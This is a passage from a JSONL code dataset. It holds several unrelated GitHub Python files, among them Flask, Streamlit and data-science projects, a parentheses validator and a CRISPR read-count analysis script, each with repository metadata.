len(nama_tanpa_cari)\n\nprint(nama_tanpa_cari)\nprint('Jumlah', cari_huruf, 'dalam', nama, 'adalah', jumlah_cari)\n\n","repo_name":"rudyabs/Materi-Purwadhika-Data_Science","sub_path":"belajar_python_fundamental/004a-len_split.py","file_name":"004a-len_split.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"id","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"41628207620","text":"import numpy as np\r\nfrom flask import Flask, request, render_template\r\nimport joblib\r\n\r\napp = Flask(__name__)\r\nmodel = joblib.load('car_price_prediction.pkl')\r\n\r\n\r\n@app.route('/')\r\ndef home():\r\n return render_template('index_car.html')\r\n\r\n\r\n@app.route('/predict', methods=['POST'])\r\ndef predict():\r\n if request.method == 'POST':\r\n Year = int(request.form['Year'])\r\n Present_Price = float(request.form['Present_Price'])\r\n Kms_Driven = int(request.form['Kms_Driven'])\r\n Kms_Driven2 = np.log(Kms_Driven)\r\n Owner = int(request.form['Owner'])\r\n Fuel_Type_Petrol = request.form['Fuel_Type_Petrol']\r\n if Fuel_Type_Petrol == 'Petrol':\r\n Fuel_Type_Petrol = 1\r\n Fuel_Type_Disel = 0\r\n else:\r\n Fuel_Type_Petrol = 0\r\n Fuel_Type_Disel = 1\r\n Year = 2020 - Year\r\n Seller_Type_Individual = request.form['Seller_Type_Individual']\r\n if Seller_Type_Individual == 'Individual':\r\n Seller_Type_Individual = 1\r\n else:\r\n Seller_Type_Individual = 0\r\n Transmission_Manual = request.form['Transmission_Manual']\r\n if Transmission_Manual == 'Manual':\r\n Transmission_Manual = 1\r\n else:\r\n Transmission_Manual = 0\r\n prediction = model.predict([[Present_Price, Kms_Driven2, Owner, Year, Fuel_Type_Disel, Fuel_Type_Petrol, Seller_Type_Individual, Transmission_Manual]])\r\n output = round(prediction[0], 2)\r\n if output < 0:\r\n return render_template('index_car.html', prediction_text='Sorry! You cannot sell this Car')\r\n else:\r\n return render_template('index_car.html', prediction_text='You can sell the car at Rs.{} lakhs'.format(output))\r\n else:\r\n render_template('index_car.html')\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)","repo_name":"saurabhaherkar/Car-Price-Prediction-ML-Project-With-Deployment","sub_path":"app_car.py","file_name":"app_car.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"3249283689","text":"import os\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom tqdm import tqdm\nfrom scipy.io import savemat\n\nfrom networksimulator import JacksonRogersModifiedModel\nfrom networkmeasure import integration\n\nif __name__ == '__main__':\n # ----- Settings -----\n # Model\n mdl_sett_ = {\n 'n_s': 3,\n 'n_d': 2,\n 'n_f': 10,\n 'alpha': 4/5,\n 'ps': (0.7, 0.3),\n 'init_integrated': True\n }\n\n idx_ = 166\n\n # Simulation\n n_step_ = 300\n n_rept_ = 10\n\n # Path\n save_path_ = os.path.join('..', 'results', 'sim_jr')\n os.makedirs(save_path_, exist_ok=True)\n\n # ----- Init. the model -----\n jr_ = JacksonRogersModifiedModel(**mdl_sett_)\n\n # ----- Big loop! ------\n measures_ = np.zeros((n_rept_, n_step_,))\n for i_rept_ in range(n_rept_):\n jr_ = JacksonRogersModifiedModel(**mdl_sett_)\n\n for i_step_ in tqdm(range(n_step_)):\n jr_.forward_one_step()\n\n measures_[i_rept_, i_step_] = integration(jr_.adj_mat, jr_.types)\n\n # Plot\n plt.plot(range(n_step_), measures_[i_rept_])\n\n # ----- Calc. equilibrium -----\n equil_ = (mdl_sett_['n_d'] + (1 - mdl_sett_['alpha'])*mdl_sett_['n_f']) \\\n / (mdl_sett_['n_s'] + mdl_sett_['n_d'] + 2*(1 - mdl_sett_['alpha'])*mdl_sett_['n_f'])\n\n plt.plot(range(n_step_), (equil_,) * n_step_, 'k--')\n\n #\n savemat(os.path.join(save_path_, 'sim_%d.mat' % idx_), {\n 'model_settings': mdl_sett_,\n 'integration': measures_\n })\n\n\n\n","repo_name":"alishiraliGit/network-health-under-modification","sub_path":"scripts/simulate_jr.py","file_name":"simulate_jr.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"35600848532","text":"from network import Network\nfrom layers import Relu, Linear, Conv2D, AvgPool2D, Reshape\nfrom utils import LOG_INFO\nfrom loss import EuclideanLoss, SoftmaxCrossEntropyLoss\nfrom solve_net import train_net, test_net\nfrom load_data import load_mnist_4d\n\ntrain_data, test_data, train_label, test_label = load_mnist_4d('data')\n\n# Your model defintion here\n# You should explore different model architecture\nmodel = Network()\nmodel.add(Conv2D('conv1', 1, 4, 3, 1, 0.01))\nmodel.add(Relu('relu1'))\nmodel.add(AvgPool2D('pool1', 2, 0)) # output shape: N x 4 x 14 x 14\nmodel.add(Conv2D('conv2', 4, 4, 3, 1, 0.01))\nmodel.add(Relu('relu2'))\nmodel.add(AvgPool2D('pool2', 2, 0)) # output shape: N x 4 x 7 x 7\nmodel.add(Reshape('flatten', (-1, 196)))\n# model.add(Reshape('flatten', (-1, 588)))\nmodel.add(Linear('fc3', 196, 10, 0.1))\n\nloss = SoftmaxCrossEntropyLoss(name='loss')\n\n# Training configuration\n# You should adjust these hyperparameters\n# NOTE: one iteration means model forward-backwards one batch of samples.\n# one epoch means model has gone through all the training samples.\n# 'disp_freq' denotes number of iterations in one epoch to display information.\n\nconfig = {\n 'learning_rate': 0.1,\n 'weight_decay': 0.0,\n 'momentum': 0.001,\n 'batch_size': 100,\n 'max_epoch': 100,\n 'disp_freq': 50,\n}\n\ndef save_file(name, array):\n with open(name, 'w') as file:\n for i in array:\n file.write('%s,' % i)\n file.close()\n\nacc_train = []\nacc_test = []\nloss_train = []\nloss_test = []\n\nfor epoch in range(config['max_epoch']):\n LOG_INFO('Training @ %d epoch...' % (epoch))\n tmp_loss, tmp_acc = train_net(model, loss, config, train_data, train_label, config['batch_size'], config['disp_freq'])\n acc_train.append(tmp_acc)\n loss_train.append(tmp_loss)\n\n LOG_INFO('Testing @ %d epoch...' % (epoch))\n tmp_loss, tmp_acc = test_net(model, loss, test_data, test_label, config['batch_size'])\n acc_test.append(tmp_acc)\n loss_test.append(tmp_loss)\n\n name = 'lr0.01mm0.01'\n save_file(name + '_loss_train', loss_train)\n save_file(name + '_acc_train', acc_train)\n save_file(name + '_loss_test', loss_test)\n save_file(name + '_acc_test', acc_test)\n","repo_name":"nielsyh/CNN-from-scratch-in-python","sub_path":"run_cnn.py","file_name":"run_cnn.py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"4628352447","text":"from flask import Flask, request, url_for\r\nfrom typing import List\r\nimport os\r\nimport movie_web_app.adapters.repository as repo\r\nfrom movie_web_app.adapters import movie_repository, database_repository\r\nfrom movie_web_app.adapters.orm import metadata, map_model_to_tables\r\n\r\n\r\nfrom sqlalchemy import create_engine\r\nfrom sqlalchemy.orm import sessionmaker, clear_mappers\r\nfrom sqlalchemy.pool import NullPool\r\n\r\nfrom movie_web_app.domainmodel import model\r\n# from movie_web_app.domainmodel.user import User\r\nfrom movie_web_app.datafilereaders.movie_file_csv_reader import MovieFileCSVReader\r\nfrom movie_web_app.domainmodel.read_title import read_title\r\n\r\n\r\ndef create_app(test_config=None):\r\n app = Flask(__name__)\r\n app.config.from_object('config.Config')\r\n data_path = os.path.join('movie_web_app', 'datafiles')\r\n\r\n if test_config is not None:\r\n # Load test configuration, and override any configuration settings.\r\n app.config.from_mapping(test_config)\r\n data_path = app.config['TEST_DATA_PATH']\r\n\r\n if app.config['REPOSITORY'] == 'movie':\r\n # Create the MemoryRepository instance for a memory-based repository.\r\n filename = '/Users/takesei/Documents/GitHub/FlixWebAppWithSQL/movie_web_app/datafiles/Data1000Movies.csv'\r\n movie_file_reader = MovieFileCSVReader(filename)\r\n repo.repo_instance = movie_repository.MainRepository()\r\n # repo.repo_instance.add_movies(movie_file_reader.dataset_of_movies)\r\n # repo.repo_instance.add_actors(movie_file_reader.dataset_of_actors)\r\n # repo.repo_instance.add_directors(movie_file_reader.dataset_of_directors)\r\n # repo.repo_instance.add_genres(movie_file_reader.dataset_of_genres)\r\n\r\n movie_repository.populate(data_path, repo.repo_instance)\r\n\r\n elif app.config['REPOSITORY'] == 'database':\r\n # Configure database.\r\n database_uri = app.config['SQLALCHEMY_DATABASE_URI']\r\n\r\n # We create a comparatively simple SQLite database, which is based on a single file (see .env for URI).\r\n # For example the file database could be located locally and relative to the application in covid-19.db,\r\n # leading to a URI of \"sqlite:///covid-19.db\".\r\n # Note that create_engine does not establish any actual DB connection directly!\r\n database_echo = app.config['SQLALCHEMY_ECHO']\r\n database_engine = create_engine(database_uri, connect_args={\"check_same_thread\": False}, poolclass=NullPool,\r\n echo=database_echo)\r\n\r\n if app.config['TESTING'] == 'True' or len(database_engine.table_names()) == 0:\r\n print(\"REPOPULATING DATABASE\")\r\n # For testing, or first-time use of the web application, reinitialise the database.\r\n clear_mappers()\r\n metadata.create_all(database_engine) # Conditionally create database tables.\r\n for table in reversed(metadata.sorted_tables): # Remove any data from the tables.\r\n database_engine.execute(table.delete())\r\n\r\n # Generate mappings that map domain model classes to the database tables.\r\n map_model_to_tables()\r\n\r\n repo.repo_instance = movie_repository.MainRepository()\r\n movie_repository.populate(data_path, repo.repo_instance)\r\n\r\n # data_filename = '/Users/takesei/Documents/GitHub/FlixSkeletonWebApp/movie_web_app/datafiles/Data1000Movies.csv'\r\n # data_filename = 'Data1000Movies.csv'\r\n # session_factory= sessionmaker(autocommit=False, autoflush= True,bind=database_engine)\r\n # database_repository.populate_reader(session_factory, data_path, data_filename)\r\n database_repository.populate(database_engine, data_path)\r\n\r\n else:\r\n # Solely generate mappings that map domain model classes to the database tables.\r\n map_model_to_tables()\r\n\r\n # Create the database session factory using sessionmaker (this has to be done once, in a global manner)\r\n session_factory = sessionmaker(autocommit=False, autoflush=True, bind=database_engine)\r\n # Create the SQLAlchemy DatabaseRepository instance for an sqlite3-based repository.\r\n repo.repo_instance = database_repository.SqlAlchemyRepository(session_factory)\r\n\r\n\r\n with app.app_context():\r\n from .movie_blueprint import movie\r\n app.register_blueprint(movie.movie_blueprint)\r\n\r\n from .home_blueprint import home\r\n app.register_blueprint(home.home_blueprint)\r\n\r\n from .actor_blueprint import actor\r\n app.register_blueprint(actor.actor_blueprint)\r\n\r\n from .director_blueprint import director\r\n app.register_blueprint(director.director_blueprint)\r\n\r\n from .genre_blueprint import genre\r\n app.register_blueprint(genre.genre_blueprint)\r\n\r\n from .search_blueprint import search\r\n app.register_blueprint(search.search_blueprint)\r\n\r\n from .authentication import authentication\r\n app.register_blueprint(authentication.authentication_blueprint)\r\n\r\n\r\n\r\n # Register a callback the makes sure that database sessions are associated with http requests\r\n # We reset the session inside the database repository before a new flask request is generated\r\n @app.before_request\r\n def before_flask_http_request_function():\r\n if isinstance(repo.repo_instance, database_repository.SqlAlchemyRepository):\r\n repo.repo_instance.reset_session()\r\n\r\n # Register a tear-down method that will be called after each request has been processed.\r\n @app.teardown_appcontext\r\n def shutdown_session(exception=None):\r\n if isinstance(repo.repo_instance, database_repository.SqlAlchemyRepository):\r\n repo.repo_instance.close_session()\r\n\r\n return app\r\n","repo_name":"Hanqing-Ouyang/FlixWebAppWithSQL","sub_path":"movie_web_app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"20977236411","text":"# -*- coding: utf-8 -*-\n\n\n# import sys\n# print(\" * Loading libraries\")\n\n# from helper import session, check_evaluation\n# It would be nice to load this code from .helper, but\n# for some reason I can make the relative load works...\n\n# import time\n# from mathics.core.parser import parse, MathicsSingleLineFeeder\n# from mathics.core.definitions import Definitions\n# from mathics.core.evaluation import Evaluation\n# from mathics.core.expression import Expression, String\nfrom mathics.session import MathicsSession\n\n\nprint(\" * creating the session\")\n\nsession = MathicsSession()\n\n\ndef test_asymptote_cmd():\n from subprocess import DEVNULL, STDOUT, check_call\n from pymathics.asy import asy_path\n res = check_call([asy_path, '--version'], stdout=DEVNULL, stderr=DEVNULL)\n assert res == 0\n\nprint(\"Try calling asy\")\ntest_asymptote_cmd()\nprint(\" now the other tests...\")\n\n\ndef check_evaluation(str_expr: str, str_expected: str, message=\"\"):\n \"\"\"Helper function to test that a WL expression against\n its results\"\"\"\n result = session.evaluate(str_expr)\n expected = session.evaluate(str_expected)\n\n# print(time.asctime())\n print(message)\n if message:\n if result == (expected, message):\n print(\" ->OK\\n\")\n else:\n print(\" unexpected result =\", result)\n else:\n if result == expected:\n print(\" ->OK\\n\")\n else:\n print(\" unexpected result =\", result)\n\nprint(\" * building tests \")\n\ntests = ['A',\n 'MatrixForm[{{a,n},{c,d}}]; a+b',\n 'Integrate[f[x],x]',\n 'Evaluate[Plot[Cos[x],{x,0,20}]]',\n# 'Evaluate[Plot3D[Cos[x*y],{x,-1,1},{y,-1,1}]]',\n 'Evaluate[DensityPlot[Cos[x*y],{x,-1,1},{y,-1,1}]]',\n]\n\nfileformats = [\"test.pdf\", \n \"test.svg\", \n \"test.png\", \n \"test.jpg\"\n]\n\ndef format_tests(str_expr: str, str_expected: str, message=\"\"):\n check_evaluation(str_expr, str_expected, message)\n\n\ntest_inputs = [ ('LoadModule[\"pymathics.asy\"]', '\"pymathics.asy\"') ] +\\\n [ ('Export[$TemporaryDirectory<>\"/\"<>\"'+ filename +'\", '+ test + ']',\n f'$TemporaryDirectory <> \"/\" <> \"{filename}\"')\n for test in tests\n for filename in fileformats\n ]\n\nprint(\" * starting tests\")\n\nfor expr, expected in test_inputs:\n print(\"\\n\", 30*\"*\")\n print(\"Expr:\", expr)\n print(\"Expected:\", expected)\n # check_evaluation(expr, expected)\n print(30*\"*\",\"\\n\")\n\nprint(\"done\")\n","repo_name":"Mathics3/pymathics-asy","sub_path":"test/tmp_exporters.py","file_name":"tmp_exporters.py","file_ext":"py","file_size_in_byte":2464,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"22"} +{"seq_id":"13217148715","text":"#Import streamlit dependancy\nimport streamlit as st\n#Import pandas to load the analytics data\nimport pandas as pd\n#Import subprocess to run tiktok script from command line\nfrom subprocess import call\n#Import plotly for visualization\nimport plotly.express as px\nfrom PIL import Image\n\n#Set page width\nst.set_page_config(layout='wide')\n\n#Importing logo image\nimage = Image.open('logo.png')\n\n#Create a sidebar\nst.sidebar.image(image, caption='Tiktok Analytics' ,use_column_width=True)\n\nst.sidebar.markdown(\"This dashboard allows you to analyze tiktok data by hashtag\")\nst.sidebar.markdown(\"Get started by
  1. Enter the hashtag you wish to analyse
  2. Hit Get Data.
  3. Get analyzing
\",\n unsafe_allow_html=True)\nst.sidebar.markdown(\"The Tiktok Unofficial API has no search by hashtag api call available. The app is currently showing hardcoded data\")\n\n\n#Getting user input for hashtag\nhashtag = st.text_input('Search for a hashtag ', value=\"\")\n\n#Search button\nif st.button('Get Data'):\n st.write('Recieved tiktok data on #'+hashtag)\n call(['python', 'tiktok.py', hashtag]) \n #Load in existing data to test it out\n df = pd.read_csv('tiktokdata.csv') \n \n #Plotly visualization \n fig = px.histogram(df, x='desc', hover_data=['desc'], y='stats_diggCount', height=300)\n st.plotly_chart(fig, use_container_width=True)\n \n #Split columns\n left_col, right_col = st.columns(2)\n \n #First chart - video stats\n scatter1 = px.scatter(df, x='stats_shareCount', y='stats_commentCount', hover_data=['desc'], size='stats_playCount', color='stats_playCount')\n left_col.plotly_chart(scatter1, use_container_width=True)\n \n #Second chart - video stats\n scatter2 = px.scatter(df, x='author_nickname', y='authorStats_videoCount', hover_data=['author_signature'], size='authorStats_followerCount', color='authorStats_followerCount')\n right_col.plotly_chart(scatter2, use_container_width=True)\n \n #Area graph\n fig2 = px.area(df, x=\"video_duration\", y=\"stats_shareCount\", color=\"author_nickname\", line_group=\"author_nickname\")\n st.plotly_chart(fig2, use_container_width=True)\n \n \n \n #Show tabular dataframe in streamlit(Raw format)\n df \n\n","repo_name":"Jayzeen/Tiktok-DataScience-App","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"39921717524","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\n# Import Libraries\nimport csv\nimport os\nimport helpers\n\nHEADERS = ['host_id', 'name', 'description', 'host_name', 'host_since', 'host_location', 'host_response_time',\n 'host_response_rate', 'host_acceptance_rate', 'host_is_superhost', 'host_total_listings_count',\n 'host_verifications', 'host_identity_verified', 'property_type', 'room_type', 'accommodates',\n 'bathrooms_text', 'bedrooms', 'beds', 'amenities', 'price', 'minimum_nights', 'maximum_nights',\n 'instant_bookable', 'number_of_reviews', 'first_review', 'last_review', 'review_scores_rating',\n 'review_scores_accuracy', 'review_scores_cleanliness', 'review_scores_checkin',\n 'review_scores_communication', 'review_scores_location', 'review_scores_value']\n\ndef extract_file(file):\n rows = []\n with open(file, 'r') as file:\n csv_reader = csv.DictReader(file)\n for row in csv_reader:\n rows.append(row)\n global UPLOADED_FILE\n UPLOADED_FILE = rows\n \n\ndef search_by_hostID():\n rows = UPLOADED_FILE\n while True:\n try:\n host_id = int(input(\"Please input the host ID: \"))\n break\n except:\n print(\"Ensure your input is an integer! \\n\")\n continue\n #finding the data by the specified host_id\n data = next((item for item in rows if item[\"host_id\"] == str(host_id)), None)\n \n if not data:\n print(f\"\\nNo listing found with 'host_id': {host_id}\")\n #returning the required data\n else:\n response = {}\n required_fields = [\"name\", \"host_name\", \"description\", \"host_location\", \"host_since\"]\n\n for i in required_fields:\n response[i]= data[i]\n \n print('--------------------------------------------------------------------------\\n')\n print(response, end='\\n')\n inquire_further_search()\n\ndef search_by_location():\n response = {}\n while True:\n try:\n input_location = str(input(\"Please input your desired location: \"))\n break\n except Exception as e:\n print(f\"Error: {e}\")\n\n #finding the data with the specified location\n all_data = []\n\n for item in UPLOADED_FILE:\n if str(item[\"host_location\"]) == input_location.capitalize():\n all_data.append(item)\n\n if len(all_data) > 0:\n #returning the required data\n\n while True:\n choose_to_specify = str(input(\"\\nDo you have specific fields you would like to return?(y/n): \"))\n if choose_to_specify.lower() == 'y':\n specify_fields = str(input(\"\\nInput specific fields (seperate by space only): \"))\n mod_specify_fields = [x.lower() for x in specify_fields.split()]\n if (all(x in HEADERS for x in mod_specify_fields) == False):\n print(f\"\\nWrong input. Available fields are: {', '.join(HEADERS)} \\n\")\n continue\n else:\n required_fields = mod_specify_fields\n break\n else:\n required_fields = [\"host_name\", \"property_type\", \"price\", \"minimum_nights\", \"maximum_nights\"]\n break\n if len(all_data) > 10:\n print('--------------------------------------------------------------------------\\n')\n for data in all_data[:10]:\n for i in required_fields:\n response[i] = data[i]\n print(response)\n print(f'... no. of responses = {len(all_data)}\\n')\n else:\n print('--------------------------------------------------------------------------\\n')\n for data in all_data:\n for i in required_fields:\n response[i] = data[i]\n print(response)\n inquire_further_search()\n \n else:\n\n all_locations = [ sub['host_location'] for sub in UPLOADED_FILE ]\n locations = set(all_locations)\n\n print(f\"\\nOops! No listing found for {input_location} \\n\")\n print(f\"The available locations are: {str(locations)} \\n\")\n\n while True:\n try_again = str(input(\"\\nWould you like to try another location? (y/n): \"))\n if try_again.lower() == 'y':\n search_by_location()\n elif try_again.lower() == 'n':\n print(\"Thank you! \\n\")\n break\n else:\n print(\"Invalid input! \\n\")\n continue\n \n inquire_further_search()\n\n\n# search by property type\ndef search_by_property_type():\n while True:\n try:\n input_property_type = str(input(\"\\nPlease input your desired property type: \"))\n break\n except Exception as e:\n print(f\"Error: {e}\")\n continue\n\n #finding the data with the specified location\n all_data = []\n for item in UPLOADED_FILE:\n if str(item[\"property_type\"]).lower() == input_property_type.lower():\n all_data.append(item)\n\n if len(all_data) > 0:\n #returning the required data\n response = {}\n print('--------------------------------------------------------------------------\\n')\n\n for data in all_data:\n required_fields = [\"room_type\", \"accommodates\", \"bathrooms_text\", \"bedrooms\", \"beds\"]\n for i in required_fields:\n response[i] = data[i]\n print(response, end=\"\\n\")\n inquire_further_search()\n else:\n all_property_types = [ sub['property_type'] for sub in UPLOADED_FILE ]\n property_types = set(all_property_types)\n\n print(f\"\\nOops! No listing found for {input_property_type} \\n\")\n print(f\"The available property types are: {str(property_types)} \\n\")\n\n try_again = str(input(\"\\nWould you like to try another property type? (y/n): \"))\n while True:\n if try_again.lower() == 'y':\n search_by_property_type()\n elif try_again.lower() == 'n':\n print(\"\\nThank you! \\n\")\n break\n else:\n print(\"\\nInvalid input! \\n\")\n continue\n\n inquire_further_search()\n\n# Giving the user options to select from\ndef initialize_search():\n print(\"\\nTo search by 'host_id', type '1'\")\n print(\"To search by 'location', type '2'\")\n print(\"To search by 'property type', type '3'\\n\")\n\n search_param = int(input(\"Please input your desired search option: \"))\n\n if search_param == 1:\n search_by_hostID()\n\n elif search_param == 2:\n search_by_location()\n\n elif search_param == 3:\n search_by_property_type()\n\n else:\n print(\"\\nInvalid input! Try again\\n\")\n initialize_search()\n\n# request further search, to come after satisfaction of each question1!!!\ndef inquire_further_search():\n while True:\n try:\n search_again = str(input(\"\\nWould you like to make another search? (y/n): \"))\n if search_again.lower() == 'y':\n initialize_search()\n elif search_again.lower() == 'n':\n print(f'\\nThank you!\\n')\n while True:\n try:\n main_menu = str(input(\"Would you like to return to main menu? (y/n): \"))\n if main_menu.lower() == 'y':\n helpers.make_selection()\n elif main_menu.lower() == 'n':\n print(f'\\nThank you!\\n')\n os._exit(0)\n else:\n print(f'{main_menu} is an invalid input. Try again!')\n continue\n except Exception as e:\n print(f\"Error: {e}\")\n continue\n else:\n print(f'{search_again} is an invalid input. Try again!')\n continue\n except Exception as e:\n print(f\"Error: {e}\")\n continue\n\n","repo_name":"Gbolahan10/Data_Analytics_AirBnB","sub_path":"Process_Section_1.py","file_name":"Process_Section_1.py","file_ext":"py","file_size_in_byte":8127,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"40612358790","text":"\"\"\"\nLet's say:\n\n'(', '{', '[' are called \"openers.\"\n')', '}', ']' are called \"closers.\"\nWrite an efficient function that tells us whether or not an input string's openers and closers are properly nested.\n\nExamples:\n\n\"{ [ ] ( ) }\" should return True\n\"{ [ ( ] ) }\" should return False\n\"{ [ }\" should return False\n\"\"\"\n\n\nPARENS_DICT = {\n \"{\": \"}\",\n \"[\": \"]\",\n \"(\": \")\",\n}\n\n\n# Approach 1: use a list as a stack\ndef multi_parens_approach_1(parens):\n stack = []\n for paren in parens:\n if paren in PARENS_DICT.keys():\n stack.append(paren)\n else:\n if len(stack) < 1:\n return False\n else:\n last_item = stack[-1]\n if PARENS_DICT[last_item] == paren:\n stack.pop()\n else:\n return False\n return len(stack) == 0\n\n\n# Approach 2: use the stack class\nclass Stack:\n def __init__(self):\n self._items = []\n\n def is_empty(self):\n return not bool(self._items)\n\n def push(self, item):\n self._items.append(item)\n\n def pop(self):\n return self._items.pop()\n\n def peek(self):\n return self._items[-1]\n\n def size(self):\n return len(self._items)\n\n\ndef multi_parens_approach_2(parens):\n stack = Stack()\n for paren in parens:\n if paren in PARENS_DICT.keys():\n stack.push(paren)\n else:\n last_paren = stack.peek()\n if PARENS_DICT[last_paren] == paren:\n stack.pop()\n else:\n return False\n return stack.is_empty()\n","repo_name":"amymhaddad/solve_it","sub_path":"interview_cake/parentheses_validator/parentheses_validator.py","file_name":"parentheses_validator.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"31115927024","text":"import random\n\ndef analyze_result():\n\n\n result_file_path = '/home/ucar/catkin_test_ws/src/test/result.txt'\n # 定义植物和水果的映射关系\n plant_type_map = {\n 'plant_cucumber': '黄瓜植株',\n 'plant_corn': '玉米植株',\n 'plant_wheat': '小麦植株',\n 'plant_rice': '水稻植株',\n }\n fruit_type_map = {\n 'fruit_corn': '玉米果实',\n 'fruit_watermelon': '西瓜果实',\n 'fruit_cucumber': '黄瓜果实',\n }\n\n # 初始化统计结果的字典\n room_plants = {}\n fruit_counts = {}\n\n # 读取result.txt文件并进行统计\n with open(result_file_path, 'r') as file:\n lines = file.readlines()\n\n # 处理每一行的内容,统计植物类型\n for i, line in enumerate(lines):\n # 判断当前行是否为空,如果为空,则随机选择一个未知植株\n if not line.strip():\n room_plants[f'Room_{i+1}'] = '未知植株'\n else:\n plant_types = line.strip().split(' ')\n plant_counts = {plant_type: plant_types.count(plant_type) for plant_type in plant_types}\n max_plant = max(plant_counts, key=plant_counts.get)\n room_plants[f'Room_{i+1}'] = plant_type_map.get(max_plant, '未知植株')\n\n # 统计水果类型\n fruits = lines[3].strip().split(' ')\n for fruit in fruits:\n fruit_counts[fruit] = fruit_counts.get(fruit, 0) + 1\n\n # 找出最多的水果种类和数量\n max_fruit = max(fruit_counts, key=fruit_counts.get)\n max_fruit_count = fruit_counts[max_fruit]\n\n # 随机选择一个没有出现过的植株作为未知果实的替代\n used_plants = set(room_plants.values())\n unknown_plants = list(set(plant_type_map.values()) - used_plants)\n for i, room in enumerate(room_plants):\n if room_plants[room] == '未知植株':\n if unknown_plants:\n room_plants[room] = random.choice(unknown_plants)\n unknown_plants.remove(room_plants[room])\n\n # 构造输出字符串 ,D区域种植的作物为{}\n result_string = \"任务完成B区域种植的作物为{}, C区域种植的作物为{}, E区域种植的作物为{}, F区域存放的果实为{}, 数量为{}个\".format(\n room_plants['Room_1'],\n room_plants['Room_2'],\n room_plants['Room_3'],\n # room_plants['Room_4'],\n fruit_type_map.get(max_fruit, '未知果实'),\n max_fruit_count\n )\n\n return result_string\n\nprint(analyze_result())","repo_name":"dioff/Niubility_xunfei","sub_path":"test/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":2521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"24564068965","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 28 13:13:27 2016\n\n@author: philipp\n\"\"\"\n\n# Analyze count distribution\n# =======================================================================\n# Imports\nfrom __future__ import division # floating point division by default\nimport pandas as pd\nfrom Lorenz import gini\nimport yaml\nimport matplotlib\nmatplotlib.use('Agg') \nimport matplotlib.pyplot as plt\nfrom matplotlib import gridspec\nimport numpy\nimport os\nimport sys\nimport time\nimport warnings\nwarnings.simplefilter(action = \"ignore\", category = FutureWarning)\nfrom matplotlib.ticker import FuncFormatter\n\ndef kilos(x, pos):\n return '%1.0fk' % (x*1e-3)\n\ndef kilos1(x, pos):\n return '%1.1fk' % (x*1e-3)\n\ndef AnalyzeCounts(sample):\n # ------------------------------------------------\n # Print header\n # ------------------------------------------------\n print('++++++++++++++++++++++++++++++++++++++++++++++++') \n start_total = time.time() \n\n # ------------------------------------------------\n # Get parameters\n # ------------------------------------------------\n configFile = open('configuration.yaml','r')\n config = yaml.load(configFile)\n configFile.close()\n ScriptsDir = config['ScriptsDir'] \n DataDir = config['DataDir']\n AnalysisDir = config['AnalysisDir']\n sgRNAReadCountDir = config['sgRNAReadCountDir']\n GeneReadCountDir = config['GeneReadCountDir']\n OutputDir = config['CountQCDir']+sample\n res = config['dpi'] \n svg = config['svg']\n logfilename = sample+'_ReadCount_Statistics.txt'\n \n # --------------------------------------\n # Load counts\n # --------------------------------------\n os.chdir(sgRNAReadCountDir)\n colnames = ['ID','gene','counts']\n GuideFileName = sample+'_GuideCounts_normalized.txt'\n GuideFile = pd.read_table(GuideFileName, sep='\\t', names=colnames)\n ReadsPerGuide = list(GuideFile['counts'])\n L = len(ReadsPerGuide) \n os.chdir(GeneReadCountDir)\n colnames = ['gene','counts'] \n GeneFileName = sample+'_GeneCounts_normalized.txt'\n GeneFile = pd.read_table(GeneFileName, sep='\\t', names=colnames)\n ReadsPerGene = list(GeneFile['counts'])\n sgID = list(GuideFile['ID'].values) \n gene = list(GuideFile['gene'].values) \n if not os.path.exists(OutputDir):\n os.makedirs(OutputDir)\n os.chdir(OutputDir)\n\n # --------------------------------------\n # Lorenz Curve\n # --------------------------------------\n print('Computing Gini coefficients ... ') \n GiniIndex_u,xu,yu = gini(ReadsPerGuide)\n GiniIndex_g,xg,yg = gini(ReadsPerGene)\n GiniIndex_u = round(GiniIndex_u*1000)/1000\n GiniIndex_g = round(GiniIndex_g*1000)/1000\n print('Gini Index (sgRNAs): ' + str(round(GiniIndex_u*1000)/1000))\n print('Gini Index (genes): ' + str(round(GiniIndex_g*1000)/1000))\n # Plot Lorenz curves\n print('Plotting Lorenz curves ...')\n plt.figure(figsize=(3,6))\n gs = gridspec.GridSpec(2, 1)\n ax0 = plt.subplot(gs[0])\n ax1 = plt.subplot(gs[1]) \n ax0.plot(xu,yu, linewidth=2, color='green') \n ax0.plot(xu,xu, '--', color='#dbdcdd')\n ax0.set_ylim([0,1]) \n ax0.set_xlabel('Cumulative Fraction of sgRNAs', fontsize=10)\n ax0.set_ylabel('Cumulative Fraction of Reads', fontsize=10)\n ax0.tick_params(labelsize=11)\n ax0.set_title('Read Count Inequality (sgRNAs)', fontsize=10)\n ax0.text(.05,.8,'Gini coefficient: '+str((round(GiniIndex_u*1000)/1000)),fontsize=9)\n ax1.plot(xg,yg, linewidth=2, color='blue') \n ax1.plot(xg,xg, '--', color='#dbdcdd')\n ax1.set_ylim([0,1])\n ax1.set_xlabel('Cumulative Fraction of Genes', fontsize=10) \n 